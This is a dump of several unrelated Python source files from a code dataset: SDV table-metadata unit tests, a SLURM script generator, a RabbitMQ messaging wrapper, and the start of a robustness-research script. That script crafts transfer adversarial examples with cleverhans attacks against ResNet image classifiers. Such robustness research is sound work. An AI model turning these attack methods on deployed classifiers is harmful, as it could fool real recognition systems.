'pii_category': 'email',
}
metadata._fields_metadata = {
'foo': foo_metadata,
'bar': {
'type': 'categorical',
},
'baz': {
'type': 'id',
}
}
foo_values = ['<EMAIL>', '<EMAIL>', '<EMAIL>']
data = pd.DataFrame({
'foo': foo_values,
'bar': ['a', 'b', 'c'],
'baz': [1, 2, 3],
})
# Run
Table._make_anonymization_mappings(metadata, data)
# Assert
assert mock_table._get_fake_values.called_once_with(foo_metadata, 3)
mappings = metadata._ANONYMIZATION_MAPPINGS[id(metadata)]
assert len(mappings) == 1
foo_mappings = mappings['foo']
assert len(foo_mappings) == 3
assert list(foo_mappings.keys()) == foo_values
@patch('sdv.metadata.Table')
def test__make_anonymization_mappings_unique_faked_value_in_field(self, mock_table):
"""Test that ``_make_anonymization_mappings`` method creates mappings for anonymized values.
The ``_make_anonymization_mappings`` method should map equal values in the original data
to the same faked value.
Input:
- DataFrame with a field that should be anonymized based on the metadata description.
Side Effect:
- Mappings are created from the original values to faked values.
"""
# Setup
metadata = Mock()
metadata._ANONYMIZATION_MAPPINGS = {}
foo_metadata = {
'type': 'categorical',
'pii': True,
'pii_category': 'email'
}
metadata._fields_metadata = {
'foo': foo_metadata
}
data = pd.DataFrame({
'foo': ['<EMAIL>', '<EMAIL>', '<EMAIL>']
})
# Run
Table._make_anonymization_mappings(metadata, data)
# Assert
assert mock_table._get_fake_values.called_once_with(foo_metadata, 2)
mappings = metadata._ANONYMIZATION_MAPPINGS[id(metadata)]
assert len(mappings) == 1
foo_mappings = mappings['foo']
assert len(foo_mappings) == 2
assert list(foo_mappings.keys()) == ['<EMAIL>', '<EMAIL>']
@patch.object(Constraint, 'from_dict')
def test__prepare_constraints_sorts_constraints(self, from_dict_mock):
"""Test that ``_prepare_constraints`` method sorts constraints.
The ``_prepare_constraints`` method should sort constraints by putting
constraints with ``rebuild_columns`` before the ones without them.
Input:
- list of constraints with some having ``rebuild_columns``
before constraints without them.
Output:
- List of constraints sorted properly.
"""
# Setup
constraint1 = Constraint(handling_strategy='transform')
constraint2 = Constraint(handling_strategy='transform')
constraint3 = Constraint(handling_strategy='reject_sampling')
constraints = [constraint1, constraint2, constraint3]
constraint1.rebuild_columns = ['a']
constraint2.rebuild_columns = ['b']
constraint3.rebuild_columns = []
from_dict_mock.side_effect = [constraint1, constraint2, constraint3]
# Run
sorted_constraints = Table._prepare_constraints(constraints)
# Asserts
assert sorted_constraints == [constraint3, constraint1, constraint2]
@patch.object(Constraint, 'from_dict')
def test__prepare_constraints_sorts_constraints_none_rebuild_columns(self, from_dict_mock):
"""Test that ``_prepare_constraints`` method sorts constraints.
The ``_prepare_constraints`` method should sort constraints with None as
``rebuild_columns`` before those that have them.
Input:
- list of constraints with some having None as ``rebuild_columns``
listed after those with ``rebuild_columns``.
Output:
- List of constraints sorted properly.
"""
# Setup
constraint1 = Constraint(handling_strategy='transform')
constraint2 = Constraint(handling_strategy='transform')
constraint3 = Constraint(handling_strategy='reject_sampling')
constraints = [constraint1, constraint2, constraint3]
constraint1.rebuild_columns = ['a']
constraint2.rebuild_columns = ['b']
constraint3.rebuild_columns = None
from_dict_mock.side_effect = [constraint1, constraint2, constraint3]
# Run
sorted_constraints = Table._prepare_constraints(constraints)
# Asserts
assert sorted_constraints == [constraint3, constraint1, constraint2]
@patch.object(Constraint, 'from_dict')
def test__prepare_constraints_validates_constraint_order(self, from_dict_mock):
"""Test the ``_prepare_constraints`` method validates the constraint order.
If no constraint has ``rebuild_columns`` that are in a later
constraint's ``constraint_columns``, no exception should be raised.
Input:
- List of constraints with none having ``rebuild_columns``
that are in a later constraint's ``constraint_columns``.
Output:
- Sorted list of constraints.
"""
# Setup
constraint1 = Constraint(handling_strategy='reject_sampling')
constraint2 = Constraint(handling_strategy='reject_sampling')
constraint3 = Constraint(handling_strategy='transform')
constraint4 = Constraint(handling_strategy='transform')
constraints = [constraint1, constraint2, constraint3, constraint4]
constraint3.rebuild_columns = ['e', 'd']
constraint4.constraint_columns = ['a', 'b', 'c']
constraint4.rebuild_columns = ['a']
from_dict_mock.side_effect = [constraint1, constraint2, constraint3, constraint4]
# Run
sorted_constraints = Table._prepare_constraints(constraints)
# Assert
assert sorted_constraints == constraints
@patch.object(Constraint, 'from_dict')
def test__prepare_constraints_invalid_order_raises_exception(self, from_dict_mock):
"""Test the ``_prepare_constraints`` method validates the constraint order.
If one constraint has ``rebuild_columns`` that are in a later
constraint's ``constraint_columns``, an exception should be raised.
Input:
- List of constraints with some having ``rebuild_columns``
that are in a later constraint's ``constraint_columns``.
Side Effect:
- Exception should be raised.
"""
# Setup
constraint1 = Constraint(handling_strategy='reject_sampling')
constraint2 = Constraint(handling_strategy='reject_sampling')
constraint3 = Constraint(handling_strategy='transform')
constraint4 = Constraint(handling_strategy='transform')
constraints = [constraint1, constraint2, constraint3, constraint4]
constraint3.rebuild_columns = ['a', 'd']
constraint4.constraint_columns = ['a', 'b', 'c']
constraint4.rebuild_columns = ['a']
from_dict_mock.side_effect = [constraint1, constraint2, constraint3, constraint4]
# Run
with pytest.raises(Exception):
Table._prepare_constraints(constraints)
@patch('sdv.metadata.table.rdt.transformers.NumericalTransformer',
spec_set=NumericalTransformer)
def test___init__(self, transformer_mock):
"""Test that ``__init__`` method passes parameters.
The ``__init__`` method should pass the custom parameters
to the ``NumericalTransformer``.
Input:
- rounding set to an int
- max_value set to an int
- min_value set to an int
Side Effects:
- ``NumericalTransformer`` should receive the correct parameters
"""
# Run
Table(rounding=-1, max_value=100, min_value=-50)
# Asserts
assert len(transformer_mock.mock_calls) == 2
transformer_mock.assert_any_call(
dtype=int, rounding=-1, max_value=100, min_value=-50)
transformer_mock.assert_any_call(
dtype=float, rounding=-1, max_value=100, min_value=-50)
@patch.object(Table, '_prepare_constraints')
def test___init__calls_prepare_constraints(self, _prepare_constraints_mock):
"""Test that ``__init__`` method calls ``_prepare_constraints"""
# Run
Table(constraints=[])
# Assert
_prepare_constraints_mock.called_once_with([])
def test__make_ids(self):
"""Test whether regex is correctly generating expressions."""
metadata = {'subtype': 'string', 'regex': '[a-d]'}
keys = Table._make_ids(metadata, 3)
assert (keys == pd.Series(['a', 'b', 'c'])).all()
def test__make_ids_fail(self):
"""Test if regex fails with more requested ids than available unique values."""
metadata = {'subtype': 'string', 'regex': '[a-d]'}
with pytest.raises(ValueError):
Table._make_ids(metadata, 20)
def test__make_ids_unique_field_not_unique(self):
"""Test that id column is replaced with all unique values if not already unique."""
metadata_dict = {
'fields': {
'item 0': {'type': 'id', 'subtype': 'integer'},
'item 1': {'type': 'boolean'}
},
'primary_key': 'item 0'
}
metadata = Table.from_dict(metadata_dict)
data = pd.DataFrame({
'item 0': [0, 1, 1, 2, 3, 5, 5, 6],
'item 1': [True, True, False, False, True, False, False, True]
})
new_data = metadata.make_ids_unique(data)
assert new_data['item 1'].equals(data['item 1'])
assert new_data['item 0'].is_unique
def test__make_ids_unique_field_already_unique(self):
"""Test that id column is kept if already unique."""
metadata_dict = {
'fields': {
'item 0': {'type': 'id', 'subtype': 'integer'},
'item 1': {'type': 'boolean'}
},
'primary_key': 'item 0'
}
metadata = Table.from_dict(metadata_dict)
data = pd.DataFrame({
'item 0': [9, 1, 8, 2, 3, 7, 5, 6],
'item 1': [True, True, False, False, True, False, False, True]
})
new_data = metadata.make_ids_unique(data)
assert new_data['item 1'].equals(data['item 1'])
assert new_data['item 0'].equals(data['item 0'])
def test__make_ids_unique_field_index_out_of_order(self):
"""Test that updated id column is unique even if index is out of order."""
metadata_dict = {
'fields': {
'item 0': {'type': 'id', 'subtype': 'integer'},
'item 1': {'type': 'boolean'}
},
'primary_key': 'item 0'
}
metadata = Table.from_dict(metadata_dict)
data = pd.DataFrame({
'item 0': [0, 1, 1, 2, 3, 5, 5, 6],
'item 1': [True, True, False, False, True, False, False, True]
}, index=[0, 1, 1, 2, 3, 5, 5, 6])
new_data = metadata.make_ids_unique(data)
assert new_data['item 1'].equals(data['item 1'])
assert new_data['item 0'].is_unique
def test_transform_calls__transform_constraints(self):
"""Test that the `transform` method calls `_transform_constraints` with right parameters
The ``transform`` method is expected to call the ``_transform_constraints`` method
with the data and correct value for ``on_missing_column``.
Input:
- Table data
Side Effects:
- Calls _transform_constraints
"""
# Setup
data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [True, True, False]
}, index=[0, 1, 2])
dtypes = {'item 0': 'int', 'item 1': 'bool'}
table_mock = Mock()
table_mock.get_dtypes.return_value = dtypes
table_mock._transform_constraints.return_value = data
table_mock._anonymize.return_value = data
table_mock._hyper_transformer.transform.return_value = data
# Run
Table.transform(table_mock, data, 'error')
# Assert
expected_data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [True, True, False]
}, index=[0, 1, 2])
mock_calls = table_mock._transform_constraints.mock_calls
args = mock_calls[0][1]
assert len(mock_calls) == 1
assert args[0].equals(expected_data)
assert args[1] == 'error'
def test__transform_constraints(self):
"""Test that method correctly transforms data based on constraints
The ``_transform_constraints`` method is expected to loop through constraints
and call each constraint's ``transform`` method on the data.
Input:
- Table data
Output:
- Transformed data
"""
# Setup
data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [3, 4, 5]
}, index=[0, 1, 2])
transformed_data = pd.DataFrame({
'item 0': [0, 0.5, 1],
'item 1': [6, 8, 10]
}, index=[0, 1, 2])
first_constraint_mock = Mock()
second_constraint_mock = Mock()
first_constraint_mock.transform.return_value = transformed_data
        second_constraint_mock.transform.return_value = transformed_data
table_mock = Mock()
table_mock._constraints = [first_constraint_mock, second_constraint_mock]
# Run
result = Table._transform_constraints(table_mock, data)
# Assert
assert result.equals(transformed_data)
first_constraint_mock.transform.assert_called_once_with(data)
second_constraint_mock.transform.assert_called_once_with(transformed_data)
def test__transform_constraints_raises_error(self):
"""Test that method raises error when specified.
The ``_transform_constraints`` method is expected to raise ``MissingConstraintColumnError``
if the constraint transform raises one and ``on_missing_column`` is set to error.
Input:
- Table data
Side Effects:
- MissingConstraintColumnError
"""
# Setup
data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.transform.side_effect = MissingConstraintColumnError
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run/Assert
with pytest.raises(MissingConstraintColumnError):
Table._transform_constraints(table_mock, data, 'error')
def test__transform_constraints_drops_columns(self):
"""Test that method drops columns when specified.
The ``_transform_constraints`` method is expected to drop columns associated with
        a constraint if its transform raises a MissingConstraintColumnError and ``on_missing_column``
is set to drop.
Input:
- Table data
Output:
- Table with dropped columns
"""
# Setup
data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.transform.side_effect = MissingConstraintColumnError
constraint_mock.constraint_columns = ['item 0']
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run
result = Table._transform_constraints(table_mock, data, 'drop')
# Assert
expected_result = pd.DataFrame({
'item 1': [3, 4, 5]
}, index=[0, 1, 2])
assert result.equals(expected_result)
def test__validate_data_on_constraints(self):
"""Test the ``Table._validate_data_on_constraints`` method.
Expect that the method returns True when the constraint columns are in the given data,
and the constraint.is_valid method returns True.
Input:
- Table data
Output:
- None
Side Effects:
- No error
"""
# Setup
data = pd.DataFrame({
'a': [0, 1, 2],
'b': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.is_valid.return_value = pd.Series([True, True, True])
constraint_mock.constraint_columns = ['a', 'b']
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run
result = Table._validate_data_on_constraints(table_mock, data)
# Assert
assert result is None
def test__validate_data_on_constraints_invalid_input(self):
"""Test the ``Table._validate_data_on_constraints`` method.
Expect that the method returns False when the constraint columns are in the given data,
and the constraint.is_valid method returns False for any row.
Input:
- Table data contains an invalid row
Output:
- None
Side Effects:
- A ConstraintsNotMetError is thrown
"""
# Setup
data = pd.DataFrame({
'a': [0, 1, 2],
'b': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.is_valid.return_value = pd.Series([True, False, True])
constraint_mock.constraint_columns = ['a', 'b']
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run and assert
with pytest.raises(ConstraintsNotMetError):
Table._validate_data_on_constraints(table_mock, data)
def test__validate_data_on_constraints_missing_cols(self):
"""Test the ``Table._validate_data_on_constraints`` method.
Expect that the method returns True when the constraint columns are not
in the given data.
Input:
- Table data that is missing a constraint column
Output:
- None
Side Effects:
- No error
"""
# Setup
data = pd.DataFrame({
'a': [0, 1, 2],
'b': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.constraint_columns = ['a', 'b', 'c']
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run
result = Table._validate_data_on_constraints(table_mock, data)
# Assert
assert result is None
def test_from_dict_min_max(self):
"""Test the ``Table.from_dict`` method.
Expect that when min_value and max_value are not provided,
they are set to 'auto'.
Input:
- A dictionary representing a table's metadata
Output:
- A Table object
"""
# Setup
metadata_dict = {
'fields': {
'item 0': {'type': 'id', 'subtype': 'integer'},
'item 1': {'type': 'boolean'}
},
'primary_key': 'item 0'
}
# Run
metadata = Table.from_dict(metadata_dict)
# Assert
assert metadata._transformer_templates['integer'].max_value == 'auto'
assert metadata._transformer_templates['integer'].min_value == 'auto'
assert metadata._transformer_templates['integer'].rounding == 'auto'
assert metadata._transformer_templates['float'].max_value == 'auto'
assert metadata._transformer_templates['float'].min_value == 'auto'
assert metadata._transformer_templates['float'].rounding == 'auto'
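# --- Hedged usage sketch (editor's addition, not part of the original test module) ---
# Outside these unit tests, the ``Table`` metadata object is normally built from a dict
# and then fitted to and used to transform a real DataFrame, roughly like:
#
#     metadata = Table.from_dict({
#         'fields': {
#             'user_id': {'type': 'id', 'subtype': 'integer'},
#             'active': {'type': 'boolean'},
#         },
#         'primary_key': 'user_id',
#     })
#     metadata.fit(df)                  # df is a pandas DataFrame
#     transformed = metadata.transform(df)
#
# Exact entry points can differ between SDV versions; this is a sketch, not an API reference.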
| StarcoderdataPython |
1674834 | <reponame>leelabcnbc/tang_jcompneuro_revision
from sys import argv
from tang_jcompneuro.model_fitting import run_all_scripts, generate_all_scripts
from tang_jcompneuro.model_fitting_gabor import models_to_train
header = """
#!/usr/bin/env bash
#SBATCH --nodes=1
#SBATCH --cpus-per-task=2
#SBATCH --time=24:00:00
#SBATCH --mem=25G
#SBATCH --gres=gpu:1
#SBATCH --exclude=compute-1-11
# --exclude is to reserve that bad node
""".strip()
if __name__ == '__main__':
use_slurm = len(argv) == 1
print(models_to_train)
# input('haha')
script_dict = generate_all_scripts(header, 'gabor',models_to_train,
# ('multi,2,1',),
# override={
# # 'seed_list': [1],
# 'neural_dataset_to_process': ('MkE2_Shape',),
# 'subset_list': ('all',)
# },
)
run_all_scripts(script_dict, slurm=use_slurm)
| StarcoderdataPython |
3294705 | import sys,os,ssl
import pika,time
import logging
logger = logging.getLogger(__name__)
logging.getLogger('pika').setLevel(logging.WARNING)
#logging.getLogger('select_connection').setLevel(logging.DEBUG)
class MessageInterface:
def __init__(self,
username = '',
password = '',
host = '',
port = -1,
virtual_host = '/',
socket_timeout = 120,
exchange_name = '',
exchange_type = 'topic',
exchange_durable = True,
exchange_auto_delete = False,
ssl_cert = '',
ssl_key = '',
ssl_ca_certs = '',
queue_is_durable = True,
queue_is_exclusive = False,
queue_is_auto_delete = False,
):
self.username = username
self.password = password
self.host = host
self.port = port
self.virtual_host = virtual_host
self.socket_timeout = socket_timeout
self.exchange_name = exchange_name
self.exchange_type = exchange_type
self.exchange_durable = exchange_durable
self.exchange_auto_delete = exchange_auto_delete
self.queue_is_durable = queue_is_durable
self.queue_is_exclusive = queue_is_exclusive
self.queue_is_auto_delete = queue_is_auto_delete
self.ssl_cert = ssl_cert
self.ssl_key = ssl_key
self.ssl_ca_certs = ssl_ca_certs
self.credentials = None
self.parameters = None
self.connection = None
self.channel = None
def open_blocking_connection(self):
logger.debug("open blocking connection")
self.create_connection_parameters()
# open the connection and grab the channel
try:
self.connection = pika.BlockingConnection(self.parameters)
except:
logger.exception(' Exception received while trying to open blocking connection to message server')
raise
try:
self.channel = self.connection.channel()
except:
logger.exception(' Exception received while trying to open a channel to the message server')
raise
logger.debug("create exchange, name = " + self.exchange_name)
# make sure exchange exists (doesn't do anything if already created)
self.channel.exchange_declare(
exchange = self.exchange_name,
exchange_type = self.exchange_type,
durable = self.exchange_durable,
auto_delete = self.exchange_auto_delete,
)
def open_select_connection(self,
on_open_callback = None,
on_open_error_callback = None,
on_close_callback = None,
stop_ioloop_on_close = True,
):
logger.debug("create select connection")
self.create_connection_parameters()
# open the connection
if on_open_callback is not None:
try:
self.connection = pika.SelectConnection(self.parameters,
on_open_callback,
on_open_error_callback,
on_close_callback,
stop_ioloop_on_close,
)
except:
logger.error(' Exception received while trying to open select connection to message server: ' + str(sys.exc_info()))
raise
def create_connection_parameters(self):
logger.debug("create connection parameters, server = " + self.host + " port = " + str(self.port))
# need to set credentials to login to the message server
#self.credentials = pika.PlainCredentials(self.username,self.password)
self.credentials = pika.credentials.ExternalCredentials()
ssl_options_dict = {
"certfile": self.ssl_cert,
"keyfile": self.ssl_key,
"ca_certs": self.ssl_ca_certs,
"cert_reqs": ssl.CERT_REQUIRED,
}
#logger.debug(str(ssl_options_dict))
# setup our connection parameters
self.parameters = pika.ConnectionParameters(
host = self.host,
port = self.port,
virtual_host = self.virtual_host,
credentials = self.credentials,
socket_timeout = self.socket_timeout,
ssl = True,
ssl_options = ssl_options_dict,
)
def create_queue(self,name,routing_key):
# declare a random queue which this job will use to receive messages
# durable = survive reboots of the broker
# exclusive = only current connection can access this queue
# auto_delete = queue will be deleted after connection is closed
self.channel.queue_declare(
queue = str(name),
durable = self.queue_is_durable,
exclusive = self.queue_is_exclusive,
auto_delete = self.queue_is_auto_delete
)
# now bind this queue to the exchange, using a routing key
# any message submitted to the echange with the
# routing key will appear on this queue
self.channel.queue_bind(exchange=self.exchange_name,
queue=str(name),
routing_key=str(routing_key)
)
def close(self):
#self.channel.close()
#self.connection.close()
self.channel = None
self.connection = None
def send_msg(self,
message_body,
routing_key,
exchange_name = None,
message_headers = {},
priority = 0, # make message persistent
delivery_mode = 2, # default
):
try:
if exchange_name is None:
exchange_name = self.exchange_name
timestamp = time.time()
# create the message properties
properties = pika.BasicProperties(
delivery_mode = delivery_mode,
priority = priority,
timestamp = timestamp,
headers = message_headers,
)
logger.debug("sending message body:\n" + str(message_body))
logger.debug('sending message to exchange: ' + self.exchange_name)
logger.debug('sending message with routing key: ' + routing_key)
self.channel.basic_publish(
exchange = exchange_name,
routing_key = routing_key,
body = message_body,
properties = properties,
)
        except Exception as e:
logger.exception('exception received while trying to send message')
raise Exception('exception received while trying to send message' + str(e))
def receive_msg(self,queue_name):
# retrieve one message
method, properties, body = self.channel.basic_get(queue=queue_name)
return method,properties,body
def purge_queue(self,queue_name):
self.channel.queue_purge(queue = queue_name)
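# --- Hedged usage sketch (editor's addition, not part of the original module) ---
# Minimal wiring against a broker. Host, exchange and certificate paths are placeholders
# and must be replaced with real values for this to connect.
if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)
    mi = MessageInterface(
        host='broker.example.com',        # placeholder
        port=5671,                        # typical AMQPS port
        exchange_name='jobs',             # placeholder
        ssl_cert='/path/to/client.pem',   # placeholder
        ssl_key='/path/to/client.key',    # placeholder
        ssl_ca_certs='/path/to/ca.pem',   # placeholder
    )
    mi.open_blocking_connection()
    mi.create_queue('test_queue', 'test.routing.key')
    mi.send_msg('hello world', 'test.routing.key')
    method, properties, body = mi.receive_msg('test_queue')
    logger.info('received: ' + str(body))
    mi.close()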
| StarcoderdataPython |
1773242 | from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten, Lambda
from keras.optimizers import Adam, SGD
from keras.callbacks import ModelCheckpoint, LearningRateScheduler, ReduceLROnPlateau
from keras.callbacks import ReduceLROnPlateau
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import mnist, cifar10, cifar100
import tensorflow as tf
import numpy as np
import os
from scipy.io import loadmat
import math
from utils.model import resnet_v1, resnet_v2
import cleverhans.attacks as attacks
from cleverhans.utils_tf import model_eval
from utils.keras_wraper_ensemble import KerasModelWrapper
from utils.utils_model_eval import model_eval_targetacc
FLAGS = tf.app.flags.FLAGS
#Common Flags for two models
tf.app.flags.DEFINE_integer('batch_size', 50, 'batch_size for attack')
tf.app.flags.DEFINE_string('optimizer', 'mom', '')
tf.app.flags.DEFINE_string('attack_method', 'FastGradientMethod', '')
tf.app.flags.DEFINE_integer('version', 2, '')
tf.app.flags.DEFINE_float('lr', 0.01, 'initial lr')
tf.app.flags.DEFINE_bool('target', True, 'is target attack or not')
tf.app.flags.DEFINE_integer('num_iter', 10, '')
tf.app.flags.DEFINE_string('dataset', 'cifar10', '')
tf.app.flags.DEFINE_bool('use_random', False, 'whether use random center or MMLDA center in the network')
tf.app.flags.DEFINE_bool('use_dense', True, 'whether use extra dense layer in the network')
tf.app.flags.DEFINE_bool('use_leaky', False, 'whether use leaky relu in the network')
tf.app.flags.DEFINE_integer('epoch', 180, 'the epoch of model to load')
tf.app.flags.DEFINE_bool('use_BN', True, 'whether use batch normalization in the network')
# SCE, MMC-10, MMC-100, AT-SCE, AT-MMC-10, AT-MMC-100
tf.app.flags.DEFINE_string('model_1', 'SCE', '')
tf.app.flags.DEFINE_string('model_2', 'MMC-10', '')
#Specific Flags for model 1
tf.app.flags.DEFINE_float('mean_var_1', 10, 'parameter in MMLDA')
tf.app.flags.DEFINE_string('attack_method_for_advtrain_1', 'FastGradientMethod', '')
tf.app.flags.DEFINE_bool('use_target_1', False, 'whether use target attack or untarget attack for adversarial training')
tf.app.flags.DEFINE_bool('use_ball_1', True, 'whether use ball loss or softmax')
tf.app.flags.DEFINE_bool('use_MMLDA_1', True, 'whether use MMLDA or softmax')
tf.app.flags.DEFINE_bool('use_advtrain_1', True, 'whether use advtraining or normal training')
tf.app.flags.DEFINE_float('adv_ratio_1', 1.0, 'the ratio of adversarial examples in each mini-batch')
tf.app.flags.DEFINE_bool('normalize_output_for_ball_1', True, 'whether apply softmax in the inference phase')
#Specific Flags for model 2
tf.app.flags.DEFINE_float('mean_var_2', 10, 'parameter in MMLDA')
tf.app.flags.DEFINE_string('attack_method_for_advtrain_2', 'FastGradientMethod', '')
tf.app.flags.DEFINE_bool('use_target_2', False, 'whether use target attack or untarget attack for adversarial training')
tf.app.flags.DEFINE_bool('use_ball_2', True, 'whether use ball loss or softmax')
tf.app.flags.DEFINE_bool('use_MMLDA_2', True, 'whether use MMLDA or softmax')
tf.app.flags.DEFINE_bool('use_advtrain_2', True, 'whether use advtraining or normal training')
tf.app.flags.DEFINE_float('adv_ratio_2', 1.0, 'the ratio of adversarial examples in each mini-batch')
tf.app.flags.DEFINE_bool('normalize_output_for_ball_2', True, 'whether apply softmax in the inference phase')
##### model 1 is the substitute model used to craft adversarial examples, model 2 is the original model used to classify these adversarial examples.
def return_paras(model_name):
if model_name == 'SCE':
return 0, None, False, False, False, False, 0.0, True
elif model_name == 'MMC-10':
return 10.0, None, False, True, True, False, 0.0, False
elif model_name == 'MMC-100':
return 100.0, None, False, True, True, False, 0.0, False
elif model_name == 'AT-SCE':
return 0, 'MadryEtAl', True, False, False, True, 1.0, True
elif model_name == 'AT-MMC-10':
return 10, 'MadryEtAl', True, True, True, True, 1.0, False
elif model_name == 'AT-MMC-100':
return 100, 'MadryEtAl', True, True, True, True, 1.0, False
else:
return None
FLAGS.mean_var_1, FLAGS.attack_method_for_advtrain_1, FLAGS.use_target_1, FLAGS.use_ball_1, \
FLAGS.use_MMLDA_1, FLAGS.use_advtrain_1, FLAGS.adv_ratio_1, FLAGS.normalize_output_for_ball_1 = return_paras(FLAGS.model_1)
FLAGS.mean_var_2, FLAGS.attack_method_for_advtrain_2, FLAGS.use_target_2, FLAGS.use_ball_2, \
FLAGS.use_MMLDA_2, FLAGS.use_advtrain_2, FLAGS.adv_ratio_2, FLAGS.normalize_output_for_ball_2 = return_paras(FLAGS.model_2)
# Load the dataset
if FLAGS.dataset=='mnist':
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = np.expand_dims(x_train, axis=3)
x_test = np.expand_dims(x_test, axis=3)
epochs = 50
num_class = 10
epochs_inter = [30,40]
    x_place = tf.placeholder(tf.float32, shape=(None, 28, 28, 1))
elif FLAGS.dataset=='cifar10':
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
epochs = 200
num_class = 10
epochs_inter = [100,150]
x_place = tf.placeholder(tf.float32, shape=(None, 32, 32, 3))
elif FLAGS.dataset=='cifar100':
(x_train, y_train), (x_test, y_test) = cifar100.load_data()
epochs = 200
num_class = 100
epochs_inter = [100,150]
x_place = tf.placeholder(tf.float32, shape=(None, 32, 32, 3))
else:
print('Unknown dataset')
# These parameters are usually fixed
subtract_pixel_mean = True
version = FLAGS.version # Model version
n = 5 # n=5 for resnet-32 v1
# Computed depth from supplied model parameter n
if version == 1:
depth = n * 6 + 2
feature_dim = 64
elif version == 2:
depth = n * 9 + 2
feature_dim = 256
if FLAGS.use_BN==True:
BN_name = '_withBN'
print('Use BN in the model')
else:
BN_name = '_noBN'
print('Do not use BN in the model')
if FLAGS.use_random==True:
name_random = '_random'
else:
name_random = ''
if FLAGS.use_leaky==True:
name_leaky = '_withleaky'
else:
name_leaky = ''
if FLAGS.use_dense==True:
name_dense = ''
else:
name_dense = '_nodense'
#Load means in MMLDA
kernel_dict = loadmat('kernel_paras/meanvar1_featuredim'+str(feature_dim)+'_class'+str(num_class)+name_random+'.mat')
mean_logits = kernel_dict['mean_logits'] #num_class X num_dense
mean_logits_1 = FLAGS.mean_var_1 * tf.constant(mean_logits,dtype=tf.float32)
mean_logits_2 = FLAGS.mean_var_2 * tf.constant(mean_logits,dtype=tf.float32)
#MMLDA prediction function
def MMLDA_layer_1(x, means=mean_logits_1, num_class=num_class, use_ball=FLAGS.use_ball_1):
#x_shape = batch_size X num_dense
x_expand = tf.tile(tf.expand_dims(x,axis=1),[1,num_class,1]) #batch_size X num_class X num_dense
mean_expand = tf.expand_dims(means,axis=0) #1 X num_class X num_dense
logits = -tf.reduce_sum(tf.square(x_expand - mean_expand), axis=-1) #batch_size X num_class
if use_ball==True:
if FLAGS.normalize_output_for_ball_1==False:
return logits
else:
return tf.nn.softmax(logits, axis=-1)
else:
return tf.nn.softmax(logits, axis=-1)
def MMLDA_layer_2(x, means=mean_logits_2, num_class=num_class, use_ball=FLAGS.use_ball_2):
#x_shape = batch_size X num_dense
x_expand = tf.tile(tf.expand_dims(x,axis=1),[1,num_class,1]) #batch_size X num_class X num_dense
mean_expand = tf.expand_dims(means,axis=0) #1 X num_class X num_dense
logits = -tf.reduce_sum(tf.square(x_expand - mean_expand), axis=-1) #batch_size X num_class
if use_ball==True:
if FLAGS.normalize_output_for_ball_2==False:
return logits
else:
return tf.nn.softmax(logits, axis=-1)
else:
return tf.nn.softmax(logits, axis=-1)
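# --- Hedged shape sketch (editor's addition) ---
# Both MMLDA layers turn a batch of feature vectors into (negative squared) distances to
# the class means, e.g. for a batch of 4 samples:
#
#     feats = tf.zeros([4, feature_dim])   # batch_size x num_dense
#     probs = MMLDA_layer_1(feats)         # batch_size x num_class; softmax-normalized
#                                          # unless normalize_output_for_ball_1 is False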
# Load the data.
y_test_target = np.zeros_like(y_test)
for i in range(y_test.shape[0]):
l = np.random.randint(num_class)
while l == y_test[i][0]:
l = np.random.randint(num_class)
y_test_target[i][0] = l
print('Finish crafting y_test_target!!!!!!!!!!!')
# Input image dimensions.
input_shape = x_train.shape[1:]
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
clip_min = 0.0
clip_max = 1.0
# If subtract pixel mean is enabled
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
clip_min -= x_train_mean
clip_max -= x_train_mean
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_class)
y_test = keras.utils.to_categorical(y_test, num_class)
y_test_target = keras.utils.to_categorical(y_test_target, num_class)
# Define input TF placeholder
y_place = tf.placeholder(tf.float32, shape=(None, num_class))
y_target = tf.placeholder(tf.float32, shape=(None, num_class))
sess = tf.Session()
keras.backend.set_session(sess)
model_input_1 = Input(shape=input_shape)
model_input_2 = Input(shape=input_shape)
#dim of logtis is batchsize x dim_means
if version == 2:
original_model_1,_,_,_,final_features_1 = resnet_v2(input=model_input_1, depth=depth, num_classes=num_class, \
use_BN=FLAGS.use_BN, use_dense=FLAGS.use_dense, use_leaky=FLAGS.use_leaky)
else:
original_model_1,_,_,_,final_features_1 = resnet_v1(input=model_input_1, depth=depth, num_classes=num_class, \
use_BN=FLAGS.use_BN, use_dense=FLAGS.use_dense, use_leaky=FLAGS.use_leaky)
if version == 2:
original_model_2,_,_,_,final_features_2 = resnet_v2(input=model_input_2, depth=depth, num_classes=num_class, \
use_BN=FLAGS.use_BN, use_dense=FLAGS.use_dense, use_leaky=FLAGS.use_leaky)
else:
original_model_2,_,_,_,final_features_2 = resnet_v1(input=model_input_2, depth=depth, num_classes=num_class, \
use_BN=FLAGS.use_BN, use_dense=FLAGS.use_dense, use_leaky=FLAGS.use_leaky)
##### Load model 1 #####
#Whether use target attack for adversarial training
if FLAGS.use_target_1==False:
is_target_1 = ''
else:
is_target_1 = 'target'
if FLAGS.use_advtrain_1==True:
